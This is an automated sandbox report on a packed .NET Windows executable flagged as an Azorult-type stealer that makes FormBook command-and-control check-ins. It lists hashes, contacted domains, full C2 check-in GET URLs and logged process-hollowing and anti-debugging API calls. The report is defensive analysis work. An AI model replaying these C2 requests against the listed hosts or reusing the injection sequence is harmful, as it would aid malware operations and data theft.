Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 27, 2021, 9:58 a.m.	Oct. 27, 2021, 10 a.m.

Size	500.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`9b5b273ed09f8565eb795f35ba1e33c6`
SHA256	`c0363e690238ce1be218baa1c66a3fe647df3740da9448788945c6863ac6b07c`
CRC32	`CB4E6E3B`
ssdeep	`12288:7VhImH4SCWup+98p6oDGAZQrOBcGvSBJGQGQ:RF4SCWa+7oJQrMrkX`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

rundll32.exe "C:\Users\test22\AppData\Local\Temp\rundll32.exe"
2364
- rundll32.exe "C:\Users\test22\AppData\Local\Temp\rundll32.exe"
  3020

Name	Response	Post-Analysis Lookup
www.begukiu0.info
www.kangrungao.com	A 101.32.31.22	101.32.31.22
www.esyscoloradosprings.com	CNAME websites076.homestead.com A 108.167.135.122	108.167.135.122
www.ribbonofficial.com	CNAME shops.myshopify.com A 23.227.38.74	23.227.38.74
www.markarge.com	CNAME markarge.com A 182.50.132.242	182.50.132.242
www.lavishbynovell.com	A 37.97.254.27 CNAME lavishbynovell.com	37.97.254.27
www.mountlaketerraceapartments.com
www.eclecticrenaissancewoman.com	A 74.220.199.6	74.220.199.6
www.dmc--llc.com
www.floaterslaser.com	A 81.169.145.161 CNAME floaterslaser.com	81.169.145.161

IP Address	Status	Action
101.32.31.22	Active	Moloch
108.167.135.122	Active	Moloch
164.124.101.2	Active	Moloch
182.50.132.242	Active	Moloch
23.227.38.74	Active	Moloch
37.97.254.27	Active	Moloch
74.220.199.6	Active	Moloch
81.169.145.161	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 108.167.135.122:80 -> 192.168.56.103:49173	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 182.50.132.242:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 182.50.132.242:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 182.50.132.242:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 37.97.254.27:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 37.97.254.27:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 37.97.254.27:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 74.220.199.6:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 74.220.199.6:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 108.167.135.122:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 74.220.199.6:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 108.167.135.122:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 108.167.135.122:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 101.32.31.22:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 101.32.31.22:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 101.32.31.22:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 81.169.145.161:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 81.169.145.161:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 81.169.145.161:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 27, 2021, 9:58 a.m.			0	0
IsDebuggerPresent Oct. 27, 2021, 9:58 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 27, 2021, 9:58 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.eclecticrenaissancewoman.com/fqiq/?Bh=r0/ZbJtj1KlrPUtj6ktEAad/47kkdxrfw2ceKfpFhpDkJU8+thj5a8jyelsFbI6qHEc9DomI&SzrhP4=EzrtzlQp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.markarge.com/fqiq/?Bh=XEjjI14tUtVaEH1QyrI6OtCMD91wQ8G2c0pwY2Wm0y537Ju/QhVbfyWLrlCWZSdAfVrEc7mJ&SzrhP4=EzrtzlQp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.lavishbynovell.com/fqiq/?Bh=A0k50bUP9Xo0F1fuesuUyOcgxOBnaOltcHXAUh5ipYJu8U4xshhCEanj2JPK9AjCHyuZW1cJ&SzrhP4=EzrtzlQp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.kangrungao.com/fqiq/?Bh=c0qy46zMNJWMlIfJWvLWas23i13YCpczqQVz26IikTOu0V/FV9kYBe5yW824zHJtR/JIW+qz&SzrhP4=EzrtzlQp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ribbonofficial.com/fqiq/?Bh=MhZqZeIjocZO8TTrBOs++VNt6zdxCxYLlsPuJAiQzU371teukL1ZYFZBA4It4Rq6QPk1WBTT&SzrhP4=EzrtzlQp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.floaterslaser.com/fqiq/?Bh=cd5R1bQmbqnLvLG63I3E0k/wUnqrUWXrQuGYWdnnzDIYGyWqiJOfWgNnmMSyom/RYKC7YMH4&SzrhP4=EzrtzlQp

Performs some HTTP requests (6 events)

request	GET http://www.eclecticrenaissancewoman.com/fqiq/?Bh=r0/ZbJtj1KlrPUtj6ktEAad/47kkdxrfw2ceKfpFhpDkJU8+thj5a8jyelsFbI6qHEc9DomI&SzrhP4=EzrtzlQp
request	GET http://www.markarge.com/fqiq/?Bh=XEjjI14tUtVaEH1QyrI6OtCMD91wQ8G2c0pwY2Wm0y537Ju/QhVbfyWLrlCWZSdAfVrEc7mJ&SzrhP4=EzrtzlQp
request	GET http://www.lavishbynovell.com/fqiq/?Bh=A0k50bUP9Xo0F1fuesuUyOcgxOBnaOltcHXAUh5ipYJu8U4xshhCEanj2JPK9AjCHyuZW1cJ&SzrhP4=EzrtzlQp
request	GET http://www.kangrungao.com/fqiq/?Bh=c0qy46zMNJWMlIfJWvLWas23i13YCpczqQVz26IikTOu0V/FV9kYBe5yW824zHJtR/JIW+qz&SzrhP4=EzrtzlQp
request	GET http://www.ribbonofficial.com/fqiq/?Bh=MhZqZeIjocZO8TTrBOs++VNt6zdxCxYLlsPuJAiQzU371teukL1ZYFZBA4It4Rq6QPk1WBTT&SzrhP4=EzrtzlQp
request	GET http://www.floaterslaser.com/fqiq/?Bh=cd5R1bQmbqnLvLG63I3E0k/wUnqrUWXrQuGYWdnnzDIYGyWqiJOfWgNnmMSyom/RYKC7YMH4&SzrhP4=EzrtzlQp

Allocates read-write-execute memory (usually to unpack itself) (38 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74162000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74092000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a3b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a52000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02400000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x738ea000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70a71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x708d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00641000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70721000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70621000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00647000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00648000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0064d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0064e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:58 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0064f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02691000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 3020 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0007c600', u'virtual_address': u'0x00002000', u'entropy': 7.51846843793712, u'name': u'.text', u'virtual_size': u'0x0007c50c'}

entropy

7.51846843794

description

A section with a high entropy has been found

entropy

0.995995995996

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 27, 2021, 9:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 3020 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000027c	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÕ¥R@à \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 3020 process_handle: 0x0000027c	1	1	0
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3020 process_handle: 0x0000027c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÕ¥R@à \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 3020 process_handle: 0x0000027c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2364 called NtSetContextThread to modify thread in remote process 3020
NtSetContextThread Oct. 27, 2021, 9:59 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314288 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000278 process_identifier: 3020	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2364 resumed a thread in remote process 3020
NtResumeThread Oct. 27, 2021, 9:59 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 3020	1	0	0

Executed a process and injected code into it, probably while unpacking (11 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 27, 2021, 9:58 a.m.	thread_handle: 0x00000144 suspend_count: 1 process_identifier: 2364	1	0
NtResumeThread Oct. 27, 2021, 9:58 a.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2364	1	0
NtResumeThread Oct. 27, 2021, 9:58 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2364	1	0
CreateProcessInternalW Oct. 27, 2021, 9:59 a.m.	thread_identifier: 2724 thread_handle: 0x00000278 process_identifier: 3020 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\rundll32.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\rundll32.exe stack_pivoted: 0 creation_flags: 134742020 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000027c	1	1
NtGetContextThread Oct. 27, 2021, 9:59 a.m.	thread_handle: 0x00000278	1	0
NtAllocateVirtualMemory Oct. 27, 2021, 9:59 a.m.	process_identifier: 3020 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000027c	1	0
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELÕ¥R@à \|°Ô@@.textÌ{\| ` base_address: 0x00400000 process_identifier: 3020 process_handle: 0x0000027c	1	1
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: base_address: 0x00401000 process_identifier: 3020 process_handle: 0x0000027c	1	1
WriteProcessMemory Oct. 27, 2021, 9:59 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3020 process_handle: 0x0000027c	1	1
NtSetContextThread Oct. 27, 2021, 9:59 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314288 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000278 process_identifier: 3020	1	0
NtResumeThread Oct. 27, 2021, 9:59 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 3020	1	0

rundll32.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All